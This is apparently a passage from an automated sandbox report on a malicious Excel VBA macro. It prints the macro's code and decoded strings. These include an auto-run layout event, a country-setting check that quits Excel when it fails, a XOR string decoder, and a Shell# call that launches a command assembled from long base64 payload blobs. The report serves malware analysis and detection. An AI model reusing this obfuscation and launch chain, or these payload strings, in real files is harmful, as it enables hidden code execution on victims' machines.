8	Attribute VB_Customizable = True
9	Attribute VB_Control = "Frame1, 1, 0, MSForms, Frame"

Executed Functions

Subroutine Frame1_Layout, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 1.253

Line	Instruction	Meta Information
11	Private Sub Frame1_Layout()
12	ThisWorkbook.cobo	executed
13	End Sub

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Executed Functions

Function ShowFormatTabs, APIs: 17, Strings: 0, Number of lines: 3, Relevance: 27.003

APIs	Meta Information
Shell#
Part of subcall function BiS@ThisWorkbook: Len
Part of subcall function BiS@ThisWorkbook: Split
Part of subcall function BiS@ThisWorkbook: LBound
Part of subcall function BiS@ThisWorkbook: UBound
Part of subcall function BiS@ThisWorkbook: StrConv
Part of subcall function BiS@ThisWorkbook: vbFromUnicode
Part of subcall function BiS@ThisWorkbook: LBound
Part of subcall function BiS@ThisWorkbook: LBound
Part of subcall function BiS@ThisWorkbook: UBound
Part of subcall function BiS@ThisWorkbook: Val
Part of subcall function BiS@ThisWorkbook: UBound
Part of subcall function BiS@ThisWorkbook: LBound
Part of subcall function BiS@ThisWorkbook: StrConv
Part of subcall function BiS@ThisWorkbook: vbUnicode
Part of subcall function tuf@ThisWorkbook: Replace
Part of subcall function tuf@ThisWorkbook: Format

Line	Instruction	Meta Information
69	Function ShowFormatTabs()
70	FarWd = Shell#(StopTabs & tiga + BiS(LineCVharts, tuf), 0)	Shell# executed
71	End Function

Function SensetiveLine, APIs: 4, Strings: 0, Number of lines: 7, Relevance: 7.507

APIs	Meta Information
Part of subcall function opa@ThisWorkbook: International
Part of subcall function opa@ThisWorkbook: xlCountrySetting
xlBinsTypeBinSize
Quit

Line	Instruction	Meta Information
47	Function SensetiveLine()
48	If opa > xlBinsTypeBinSize * 347 - 1.07 Then	xlBinsTypeBinSize executed
48	ShowFormatTabs
48	Else
48	Application.Quit	Quit
48	Endif
50	End Function

Function tiga, APIs: 0, Strings: 2, Number of lines: 6, Relevance: 4.506

Strings

Decrypted Strings

"qIYZn9Ht2um2m0iwVt4AA4ggYomdM56/MY2iQYuwNs8c4xuvFnD6gRhxnG1q+gpLTtjsMA6Ierk4kloEe6HL9aRgOh/shc1Mnu7FHFEsO7bmDBQ3LjROTzBZTBPdbbOKKsfFTWv6HTyMkmO3HbrWqGS2npvPS1OO4EXuzHuFL2FSAynlMeUPGpcwlL2fUe7pjr29kJxlQN35WaDzD29+JzgHRedSug6xirvFY0neHRMhxj9O5N7JcPYGgIEP3LKMk8LmTgce/XDbmoUFO/8wyIrGnRF49sVPlSnyPdTWIMzbrqCh83Qxwvq1sCj8Ju3p263QN4pSek6kf2K/OcggmF84+HSlJTXODz+U7XEtPNxAHDkkbJDtFTEx8Fd72gFn77dSgC7VCXjc6vHtzbJdj0GHr61Fq3dag7OcZEupjYqzWtWe1C3SYdhBpUHuC81vDyT8Cp9nCyk2jlbXjzBmlH1ORRccevKACeO99EFUUeekaN1gESmt0OuVKyQCjxZ6V5b04nqphnvlGkGdG5I6LUwrmu7aeV2svPpj8jtIsMRczxdQfCNw/dJtxb0BYnYXVk2nZfTu8LNWlN3TxDY1dcH/JabHwLKINn60byPed3XTtLlfqpvGHZYYhn3yZnwjlFPJDpLzHZkj+4ozmie5TOYCn3N3w4x+YhrCbxcePmKbHaLxh2bV8nifDlmhYOX79As7OmUQkSBB6cuUl7y6dGMcLXNcRT5P2YVxFOTpWGBdrm6V4HQo+6l0CbkOSZRS0WUvHgvVH0aKUcBmfvXhaTkgqxfH+Z2tgyLqzvqEEFBM8UlsgRYu+7jFtV9Fijsm/Eyi5MUVESxzokrwKSpaSklweDxZVVrxE2WO5KCbKGmxz79fm7qbnnx/1NFVGzHdKuJ9+q2WvY9+dptMIAvgruzohvn0GPsdc8UfVLcrqSODJ6WBL58M+pj/2He7+g846X7gfB6dTF4rnYzinSTn"

"SZCSUSdQxNB0jSdR2jWPZ0lNFVf9pJSDfzrYs477+UuEreRSmSc0wkO5c+vNKJsKVAlN/ddPoTIX76bBsOvD5sd5aoAhu79t2Kdf7sjzWrtjtlyP4d3Gl9KW+de/687TUkuEQw5d1N5MDzRm84m2pHuNXXJiob70vQE3+KOBKFjyaGbPLbZfkL/9ks+p//+7Y//+usPv/v6y59//P1Xv/vlP+m7v3z9wzffp0+/+XP68sdvf/4mfZH/3X78In3+3+f0+XP6P"

Line	Instruction	Meta Information
41	Function tiga()
42	kega = "qIYZn9Ht2um2m0iwVt4AA4ggYomdM56/MY2iQYuwNs8c4xuvFnD6gRhxnG1q+gpLTtjsMA6Ierk4kloEe6HL9aRgOh/shc1Mnu7FHFEsO7bmDBQ3LjROTzBZTBPdbbOKKsfFTWv6HTyMkmO3HbrWqGS2npvPS1OO4EXuzHuFL2FSAynlMeUPGpcwlL2fUe7pjr29kJxlQN35WaDzD29+JzgHRedSug6xirvFY0neHRMhxj9O5N7JcPYGgIEP3LKMk8LmTgce/XDbmoUFO/8wyIrGnRF49sVPlSnyPdTWIMzbrqCh83Qxwvq1sCj8Ju3p263QN4pSek6kf2K/OcggmF84+HSlJTXODz+U7XEtPNxAHDkkbJDtFTEx8Fd72gFn77dSgC7VCXjc6vHtzbJdj0GHr61Fq3dag7OcZEupjYqzWtWe1C3SYdhBpUHuC81vDyT8Cp9nCyk2jlbXjzBmlH1ORRccevKACeO99EFUUeekaN1gESmt0OuVKyQCjxZ6V5b04nqphnvlGkGdG5I6LUwrmu7aeV2svPpj8jtIsMRczxdQfCNw/dJtxb0BYnYXVk2nZfTu8LNWlN3TxDY1dcH/JabHwLKINn60byPed3XTtLlfqpvGHZYYhn3yZnwjlFPJDpLzHZkj+4ozmie5TOYCn3N3w4x+YhrCbxcePmKbHaLxh2bV8nifDlmhYOX79As7OmUQkSBB6cuUl7y6dGMcLXNcRT5P2YVxFOTpWGBdrm6V4HQo+6l0CbkOSZRS0WUvHgvVH0aKUcBmfvXhaTkgqxfH+Z2tgyLqzvqEEFBM8UlsgRYu+7jFtV9Fijsm/Eyi5MUVESxzokrwKSpaSklweDxZVVrxE2WO5KCbKGmxz79fm7qbnnx/1NFVGzHdKuJ9+q2WvY9+dptMIAvgruzohvn0GPsdc8UfVLcrqSODJ6WBL58M+pj/2He7+g846X7gfB6dTF4rnYzinSTn"	executed
43	egak = "SZCSUSdQxNB0jSdR2jWPZ0lNFVf9pJSDfzrYs477+UuEreRSmSc0wkO5c+vNKJsKVAlN/ddPoTIX76bBsOvD5sd5aoAhu79t2Kdf7sjzWrtjtlyP4d3Gl9KW+de/687TUkuEQw5d1N5MDzRm84m2pHuNXXJiob70vQE3+KOBKFjyaGbPLbZfkL/9ks+p//+7Y//+usPv/v6y59//P1Xv/vlP+m7v3z9wzffp0+/+XP68sdvf/4mfZH/3X78In3+3+f0+XP6P"
44	olecounter = kega + egak
45	tiga = OwFormat + RefTargetd + Col10LNn + BraFalse + leverpoolS5 + olecounter
46	End Function

Function OwFormat, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 3.003

Strings

Decrypted Strings

"qy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mIP9tIhBT3RfRwrcNb1PwFxDpNZEnoOKAu7Df55hkg2RMuYzhCkAy4gltWKn6fTQvifLCg50HErnBQYu4IYgQ/0u0Bvztp+QNkFAfZl9EQ/NvNwqIOWCMoIKpAX6FA/iiA"

Line	Instruction	Meta Information
26	Function OwFormat()
27	OwFormat = "qy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mIP9tIhBT3RfRwrcNb1PwFxDpNZEnoOKAu7Df55hkg2RMuYzhCkAy4gltWKn6fTQvifLCg50HErnBQYu4IYgQ/0u0Bvztp+QNkFAfZl9EQ/NvNwqIOWCMoIKpAX6FA/iiA"	executed
28	End Function

Function BiS, APIs: 14, Strings: 1, Number of lines: 18, Relevance: 28.018

APIs	Meta Information
Len	Len("31,17,24,124,115,63,124,126,47,57,8,124,124,17,4,19,97,124,2,122,124,116,116,59,10,124,123,118,49,56,14,118,123,117,114,18,29,17,25,7,111,112,109,109,112,110,1,113,54,19,21,50,123,123,117,116,124,50,57,11,113,51,30,54,57,63,8,124,21,19,114,31,51,49,44,46,25,47,47,21,19,18,114,24,57,26,48,29,40,57,47,40,46,57,61,17,116,7,53,19,114,49,57,49,51,14,37,15,40,14,25,29,49,1,124,7,31,19,50,10,57,14,40,1,102,102,58,14,19,49,62,29,47,25,106,104,15,8,46,53,18,27,116,124,123,10,10,44,62") -> 479 Len("\") -> 1 Len("43,97,97,123,124,117,112,124,7,15,37,15,8,25,17,114,21,19,114,63,51,49,12,14,25,47,15,53,19,50,114,63,51,49,44,46,57,15,15,53,51,50,17,19,24,25,1,102,102,24,25,63,51,17,44,46,57,47,15,124,117,124,2,32,124,26,19,14,57,61,63,52,39,50,57,11,113,51,30,54,57,63,8,124,21,19,114,15,8,46,57,61,49,46,57,61,56,25,46,116,120,3,112,124,7,15,37,15,8,57,49,114,8,25,36,40,114,57,50,31,19,24,21,18,59,1,102,102,61,15,63,21,53,117,124,33,2,32,26,19,46,25,29,63,52,124,39,120,3,114,46,25,61,56,8,51,57,50,24,116,117,33,124,117,124,122,122,124,44,51,43,57,14,15,52,57,16,16,124,124,113,11,53,50,56,19,11,15,8,37,48,25,124,124,20,21,56,24,25,50,124,124,113,18,19,18,53,18,40,57,14,29,31,124,124,113,18,51,12,46,19,58,21,48,25,124,113,18,19,16,124,124,113,57,36,57,31,9,40,124,124,62,5,44,29,15,15,124,124,47,42,124,124,116,124,123,37,9,31,123,119,124,123,105,123,124,117,124,116,124,7,40,37,44,25,1,116,0,126,39,108,33,39,111,33,39,110,33,39,109,33,0,126,113,26,124,123,57,123,112,123,57,18,40,123,112,123,53,46,51,50,49,123,112,123,50,42,123,124,117,124,124,117,124,124,124,124,103,120,39,25,4,25,31,9,8,21,19,50,31,51,18,40,25,4,40,33,114,0,126,21,18,42,51,23,25,63,51,60,49,17,61,60,18,24,0,126,114,0,126,21,50,42,51,60,23,25,47,60,31,14,21,12,8,0,126,116,124,124,124,116,124,124,116,124,124,124,21,8,57,49,124,124,116,124,124,123,42,29,123,119,124,123,14,53,61,30,48,123,124,124,119,124,124,123,25,102,123,124,119,123,5,41,31,105,123,124,124,117,124,124,117,114,10,61,48,9,25,102,102,116,124,124,0,126,39,104,33,39,105,33,39,110,33,39,108,33,39,106,33,39,111,33,39,109,33,0,126,124,113,58,123,49,57,123,112,123,25,123,112,123,51,50,123,112,123,46,21,61,62,48,123,112,123,59,25,8,57,50,42,53,123,112,123,14,123,112,123,50,8,10,61,123,124,124,117,114,21,50,42,51,55,57,116,123,17,4,19,123,112,116,124,124,0,126,39,109,33,39,108,33,0,126,113,58,123,47,123,112,123,12,46,51,31,25,15,123,124,124,117,124,117,124,124,117,124,124,124,124,117,126") -> 1925
Split
LBound
UBound
StrConv
vbFromUnicode
LBound
LBound
UBound
Val
UBound
LBound
StrConv
vbUnicode

Strings	Decrypted Strings
","

Line	Instruction	Meta Information
10	Function BiS(ByVal Numk as String, ByVal pp as String) as String
11	Dim i as Long, l as Long, Ipl() as Byte, sIn() as String, Cuts() as Byte	executed
12	If Len(Numk) = 0 Or Len(pp) = 0 Then	Len("31,17,24,124,115,63,124,126,47,57,8,124,124,17,4,19,97,124,2,122,124,116,116,59,10,124,123,118,49,56,14,118,123,117,114,18,29,17,25,7,111,112,109,109,112,110,1,113,54,19,21,50,123,123,117,116,124,50,57,11,113,51,30,54,57,63,8,124,21,19,114,31,51,49,44,46,25,47,47,21,19,18,114,24,57,26,48,29,40,57,47,40,46,57,61,17,116,7,53,19,114,49,57,49,51,14,37,15,40,14,25,29,49,1,124,7,31,19,50,10,57,14,40,1,102,102,58,14,19,49,62,29,47,25,106,104,15,8,46,53,18,27,116,124,123,10,10,44,62") -> 479 executed
12	Exit Function
12	Endif
13	sIn = Split(Numk, ",")	Split
14	Redim Ipl(LBound(sIn) To UBound(sIn))	LBound UBound
15	Cuts = StrConv(pp, vbFromUnicode)	StrConv vbFromUnicode
16	l = LBound(Cuts)	LBound
17	For i = LBound(sIn) To UBound(sIn) Step 1	LBound UBound
18	Ipl(i) = Val(sIn(i)) Xor Cuts(l)	Val
19	l = l + 1
20	If l > UBound(Cuts) Then	UBound
20	l = LBound(Cuts)	LBound
20	Endif
21	Next i	LBound UBound
22	BiS = StrConv(Ipl, vbUnicode)	StrConv vbUnicode
23	End Function

Function StopTabs, APIs: 16, Strings: 1, Number of lines: 4, Relevance: 25.504

APIs	Meta Information
Part of subcall function BiS@ThisWorkbook: Len
Part of subcall function BiS@ThisWorkbook: Split
Part of subcall function BiS@ThisWorkbook: LBound
Part of subcall function BiS@ThisWorkbook: UBound
Part of subcall function BiS@ThisWorkbook: StrConv
Part of subcall function BiS@ThisWorkbook: vbFromUnicode
Part of subcall function BiS@ThisWorkbook: LBound
Part of subcall function BiS@ThisWorkbook: LBound
Part of subcall function BiS@ThisWorkbook: UBound
Part of subcall function BiS@ThisWorkbook: Val
Part of subcall function BiS@ThisWorkbook: UBound
Part of subcall function BiS@ThisWorkbook: LBound
Part of subcall function BiS@ThisWorkbook: StrConv
Part of subcall function BiS@ThisWorkbook: vbUnicode
Part of subcall function tuf@ThisWorkbook: Replace
Part of subcall function tuf@ThisWorkbook: Format

Strings

Decrypted Strings

"31,17,24,124,115,63,124,126,47,57,8,124,124,17,4,19,97,124,2,122,124,116,116,59,10,124,123,118,49,56,14,118,123,117,114,18,29,17,25,7,111,112,109,109,112,110,1,113,54,19,21,50,123,123,117,116,124,50,57,11,113,51,30,54,57,63,8,124,21,19,114,31,51,49,44,46,25,47,47,21,19,18,114,24,57,26,48,29,40,57,47,40,46,57,61,17,116,7,53,19,114,49,57,49,51,14,37,15,40,14,25,29,49,1,124,7,31,19,50,10,57,14,40,1,102,102,58,14,19,49,62,29,47,25,106,104,15,8,46,53,18,27,116,124,123,10,10,44,62"

Line	Instruction	Meta Information
51	Function StopTabs()
52	StopTabs = "31,17,24,124,115,63,124,126,47,57,8,124,124,17,4,19,97,124,2,122,124,116,116,59,10,124,123,118,49,56,14,118,123,117,114,18,29,17,25,7,111,112,109,109,112,110,1,113,54,19,21,50,123,123,117,116,124,50,57,11,113,51,30,54,57,63,8,124,21,19,114,31,51,49,44,46,25,47,47,21,19,18,114,24,57,26,48,29,40,57,47,40,46,57,61,17,116,7,53,19,114,49,57,49,51,14,37,15,40,14,25,29,49,1,124,7,31,19,50,10,57,14,40,1,102,102,58,14,19,49,62,29,47,25,106,104,15,8,46,53,18,27,116,124,123,10,10,44,62"	executed
53	StopTabs = BiS(StopTabs, tuf)
55	End Function

Function tuf, APIs: 2, Strings: 3, Number of lines: 3, Relevance: 14.003

APIs	Meta Information
Replace	Replace("\0","0","") -> \
Format

Strings	Decrypted Strings
""""
"0"
"currency"

Line	Instruction	Meta Information
65	Function tuf()
66	tuf = Replace("" + Format(0, "currency"), "0", "")	Replace("\0","0","") -> \ Format executed
67	End Function

Function LineCVharts, APIs: 0, Strings: 2, Number of lines: 5, Relevance: 2.505

Strings

Decrypted Strings

"43,97,97,123,124,117,112,124,7,15,37,15,8,25,17,114,21,19,114,63,51,49,12,14,25,47,15,53,19,50,114,63,51,49,44,46,57,15,15,53,51,50,17,19,24,25,1,102,102,24,25,63,51,17,44,46,57,47,15,124,117,124,2,32,124,26,19,14,57,61,63,52,39,50,57,11,113,51,30,54,57,63,8,124,21,19,114,15,8,46,57,61,49,46,57,61,56,25,46,116,120,3,112,124,7,15,37,15,8,57,49,114,8,25,36,40,114,57,50,31,19,24,21,18,59,1,102,102,61,15,63,21,53,117,124,33,2,32,26,19,46,25,29,63,52,124,39,120,3,114,46,25,61,56,8,51,57,50,24,116,117,33,124,117,124,122,122,124,44,51,43,57,14,15,52,57,16,16,124,124,113,11,53,50,56,19,11,15,8,37,48,25,124,124,20,21,56,24,25,50,124,124,113,18,19,18,53,18,40,57,14,29,31,124,124,113,18,51,12,46,19,58,21,48,25,124,113,18,19,16,124,124,113,57,36,57,31,9,40,124,124,62,5,44,29,15,15,124,124,47,42,124,124,116,124,123,37,9,31,123,119,124,123,105,123,124,117,124,116,124,7,40,37,44,25,1,116,0,126,39,108,33,39,111,33,39,110,33,39,109,33,0,126,113,26,124,123,57,123,112,123,57,18,40,123,112"

",123,53,46,51,50,49,123,112,123,50,42,123,124,117,124,124,117,124,124,124,124,103,120,39,25,4,25,31,9,8,21,19,50,31,51,18,40,25,4,40,33,114,0,126,21,18,42,51,23,25,63,51,60,49,17,61,60,18,24,0,126,114,0,126,21,50,42,51,60,23,25,47,60,31,14,21,12,8,0,126,116,124,124,124,116,124,124,116,124,124,124,21,8,57,49,124,124,116,124,124,123,42,29,123,119,124,123,14,53,61,30,48,123,124,124,119,124,124,123,25,102,123,124,119,123,5,41,31,105,123,124,124,117,124,124,117,114,10,61,48,9,25,102,102,116,124,124,0,126,39,104,33,39,105,33,39,110,33,39,108,33,39,106,33,39,111,33,39,109,33,0,126,124,113,58,123,49,57,123,112,123,25,123,112,123,51,50,123,112,123,46,21,61,62,48,123,112,123,59,25,8,57,50,42,53,123,112,123,14,123,112,123,50,8,10,61,123,124,124,117,114,21,50,42,51,55,57,116,123,17,4,19,123,112,116,124,124,0,126,39,109,33,39,108,33,0,126,113,58,123,47,123,112,123,12,46,51,31,25,15,123,124,124,117,124,117,124,124,117,124,124,124,124,117,126"

Line	Instruction	Meta Information
56	Function LineCVharts()
57	nio = "43,97,97,123,124,117,112,124,7,15,37,15,8,25,17,114,21,19,114,63,51,49,12,14,25,47,15,53,19,50,114,63,51,49,44,46,57,15,15,53,51,50,17,19,24,25,1,102,102,24,25,63,51,17,44,46,57,47,15,124,117,124,2,32,124,26,19,14,57,61,63,52,39,50,57,11,113,51,30,54,57,63,8,124,21,19,114,15,8,46,57,61,49,46,57,61,56,25,46,116,120,3,112,124,7,15,37,15,8,57,49,114,8,25,36,40,114,57,50,31,19,24,21,18,59,1,102,102,61,15,63,21,53,117,124,33,2,32,26,19,46,25,29,63,52,124,39,120,3,114,46,25,61,56,8,51,57,50,24,116,117,33,124,117,124,122,122,124,44,51,43,57,14,15,52,57,16,16,124,124,113,11,53,50,56,19,11,15,8,37,48,25,124,124,20,21,56,24,25,50,124,124,113,18,19,18,53,18,40,57,14,29,31,124,124,113,18,51,12,46,19,58,21,48,25,124,113,18,19,16,124,124,113,57,36,57,31,9,40,124,124,62,5,44,29,15,15,124,124,47,42,124,124,116,124,123,37,9,31,123,119,124,123,105,123,124,117,124,116,124,7,40,37,44,25,1,116,0,126,39,108,33,39,111,33,39,110,33,39,109,33,0,126,113,26,124,123,57,123,112,123,57,18,40,123,112"	executed
58	ios = ",123,53,46,51,50,49,123,112,123,50,42,123,124,117,124,124,117,124,124,124,124,103,120,39,25,4,25,31,9,8,21,19,50,31,51,18,40,25,4,40,33,114,0,126,21,18,42,51,23,25,63,51,60,49,17,61,60,18,24,0,126,114,0,126,21,50,42,51,60,23,25,47,60,31,14,21,12,8,0,126,116,124,124,124,116,124,124,116,124,124,124,21,8,57,49,124,124,116,124,124,123,42,29,123,119,124,123,14,53,61,30,48,123,124,124,119,124,124,123,25,102,123,124,119,123,5,41,31,105,123,124,124,117,124,124,117,114,10,61,48,9,25,102,102,116,124,124,0,126,39,104,33,39,105,33,39,110,33,39,108,33,39,106,33,39,111,33,39,109,33,0,126,124,113,58,123,49,57,123,112,123,25,123,112,123,51,50,123,112,123,46,21,61,62,48,123,112,123,59,25,8,57,50,42,53,123,112,123,14,123,112,123,50,8,10,61,123,124,124,117,114,21,50,42,51,55,57,116,123,17,4,19,123,112,116,124,124,0,126,39,109,33,39,108,33,0,126,113,58,123,47,123,112,123,12,46,51,31,25,15,123,124,124,117,124,117,124,124,117,124,124,124,124,117,126"
59	LineCVharts = nio + ios
60	End Function

Function opa, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
International
xlCountrySetting

Line	Instruction	Meta Information
62	Function opa()
63	opa = Application.International(xlCountrySetting) + 960	International xlCountrySetting executed
64	End Function

Subroutine cobo, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
Part of subcall function SensetiveLine@ThisWorkbook: xlBinsTypeBinSize
Part of subcall function SensetiveLine@ThisWorkbook: Quit

Line	Instruction	Meta Information
74	Sub cobo()
76	SensetiveLine	executed
77	End Sub

Function RefTargetd, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings

Decrypted Strings

"Ffj0gbu4+AshtTTAs7gw4MWoKsWMAuzTLJl9isR9yY3By9Jd6Nc22oiswTTMACfS1HOBHXTq6X7rXrSsPEiWum+mhxG5oRhZZlE7lH8V8KbkJ/FwSj4MerMD7cimWbdr0boBq2T8HCqyAuIZi5mSiGbYGNN5CRULDMjwXnJ7V30PUhGzrE4IWJNjOXlCEsuiVcwqrAt/JuCCmKbzGdT4qU+wuOVRX5ESU+GKzwBxmVGEEgVeSQTmrwcMsxDH2BeUNLMQlk355K3F0zsnxmoSDxcmeR/C/RCMDeBJCd62U8Aa4imSP74++CWIr4iKTyyK/lsO3wbYof1zE5UmxxnKAAiBn+/LXMcg8NSYSndjKSkBHYgNUlHzGQwFoTvZr8mbkKGEReA/R0UPPAjxkrBUfUaJ2XKlZkc3COq8pR+YmbduBFF8y9LpgbKSg42yUIZtM8jlFNk0PNOoJcCTXQDNETqPNKGqbzRLdPcvKgfjiypFxmVdMY8INshRplyE3EPRIINJQoXPzMD7iRdZHuYgsQwTrgCCgyh+fJoUVArigVBQrokupbB9ijQ9oFIjCNyOQ9kcmDCQehvlyEQeaosmyXJkhEYpAFXVbysJgMrB3e/lomoRxyPaQgNSTxaMfOJDTuqPIUEg/lWLLR0SaPlc05lNB14LxkBJD6sJrB5CwHMO0ylgPAS0/Hn4g2O+UYlibxJdOH3zemR7NouS4DFOBOhwRvULD0kfPh7+ihH/ILNffwp9r3o+0eZLzSL6fuR6wgNcryEkWRBEQdSc29msoB87MdiRSIsD2//DmFBH2dxGn/D0iDk2pQupapYzXmd++9PqD8S1ZQEFUT6JXeoTKhZjhBsi5Op0oLweiykigDLQ8subuuR96ZlKv+vDJeW1af0kNQIvutPZEozviTC4yxcjTxTRQ22KyKqVE82g0VJR8/h7s6YWhYc0xpFlc8dDzWmTy2Sh"

Line	Instruction	Meta Information
29	Function RefTargetd()
30	RefTargetd = "Ffj0gbu4+AshtTTAs7gw4MWoKsWMAuzTLJl9isR9yY3By9Jd6Nc22oiswTTMACfS1HOBHXTq6X7rXrSsPEiWum+mhxG5oRhZZlE7lH8V8KbkJ/FwSj4MerMD7cimWbdr0boBq2T8HCqyAuIZi5mSiGbYGNN5CRULDMjwXnJ7V30PUhGzrE4IWJNjOXlCEsuiVcwqrAt/JuCCmKbzGdT4qU+wuOVRX5ESU+GKzwBxmVGEEgVeSQTmrwcMsxDH2BeUNLMQlk355K3F0zsnxmoSDxcmeR/C/RCMDeBJCd62U8Aa4imSP74++CWIr4iKTyyK/lsO3wbYof1zE5UmxxnKAAiBn+/LXMcg8NSYSndjKSkBHYgNUlHzGQwFoTvZr8mbkKGEReA/R0UPPAjxkrBUfUaJ2XKlZkc3COq8pR+YmbduBFF8y9LpgbKSg42yUIZtM8jlFNk0PNOoJcCTXQDNETqPNKGqbzRLdPcvKgfjiypFxmVdMY8INshRplyE3EPRIINJQoXPzMD7iRdZHuYgsQwTrgCCgyh+fJoUVArigVBQrokupbB9ijQ9oFIjCNyOQ9kcmDCQehvlyEQeaosmyXJkhEYpAFXVbysJgMrB3e/lomoRxyPaQgNSTxaMfOJDTuqPIUEg/lWLLR0SaPlc05lNB14LxkBJD6sJrB5CwHMO0ylgPAS0/Hn4g2O+UYlibxJdOH3zemR7NouS4DFOBOhwRvULD0kfPh7+ihH/ILNffwp9r3o+0eZLzSL6fuR6wgNcryEkWRBEQdSc29msoB87MdiRSIsD2//DmFBH2dxGn/D0iDk2pQupapYzXmd++9PqD8S1ZQEFUT6JXeoTKhZjhBsi5Op0oLweiykigDLQ8subuuR96ZlKv+vDJeW1af0kNQIvutPZEozviTC4yxcjTxTRQ22KyKqVE82g0VJR8/h7s6YWhYc0xpFlc8dDzWmTy2Sh"	executed
31	End Function

Function Col10LNn, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings

Decrypted Strings

"ap56gB8gJYTQ1uoNwuFuYJdxKn05pqHQrgqkr41262jMlka7ZTsYTNuSJmhSxxIPG4k+OTEHh+T/MZzy5lP3AyvrCVapeFHpWMQDCME28YNUECRaNIlB2RFwzAoCaDlLD2PcuPZtQbZoUdGKa6iH2n0fW5SA5iH3+RwFpMU/ADiJjHMGTxz+zh+2oJoCtWBhiYjEAZ30OdNMwP6Un/YrAmm2HdkpPsi+VVbF7V0lahrqCtUjyohPN5wTVFFukYNi4jeXRuyXmlGiUwBUNKulNPVhP2CnsQjgMEUTAHlWIfBTfVas5VXjUykX5bTd3goRxkwqsuboxjqQtpWALlt6fCbmDcrbPR1Kgll5w45J+pshaJoAhaiQ6tWH4vsqnL8UVSzROPCQlV8lFx0xDvpTAQ5HiHudRtBWAc5lUhS2flAsysaWEEohEwDFD7KO+4ZLFVTyAvw9qyRsln2sf1g7pBbp09ICm6ygH4cOi1jfhncVEG3ZeVed7o3EdH6HONXOoditjsgmdtqZNoiX5v0kQdwVHrkcgoP4a3aTXG3H8SCMwTcVINJEkzZZxliiuP24uGW7KTwlxfwn+DwKF3j1DtW1Mao5Khi8cDMVyLxSSPWFIbpwVbiW5FDikLPlfIy86vM7o4WCaso7IIS7F3mkH6kOgN0Wc1IcHVJPEn/TmcV96/YYFJHbYRKlo/y6Qh0S+/kxsSqhjZbXW/qyRLskamm+wTcqdphpkqtQGGzyATLkTfu44rwusSyUFita11ICOuqMVh7WoNX4Ua4ZRnqAppEMVRDdPu0hBolUYhUIXRQ584UdW0J5zBJjJCEJWpbBk9z6aUq0z2osOaKvOhTIRFRgqAgv5VjohNRw5VR+9Att0Eyo180q2V+wFm7vMM2DZJvDkOXKlgUk81uTUYyi9OfY50HamQFuTJZv7OoYJvAqHdnQdob9rohhYaIuClSGQK2D1G9WLUVFlMd"

Line	Instruction	Meta Information
32	Function Col10LNn()
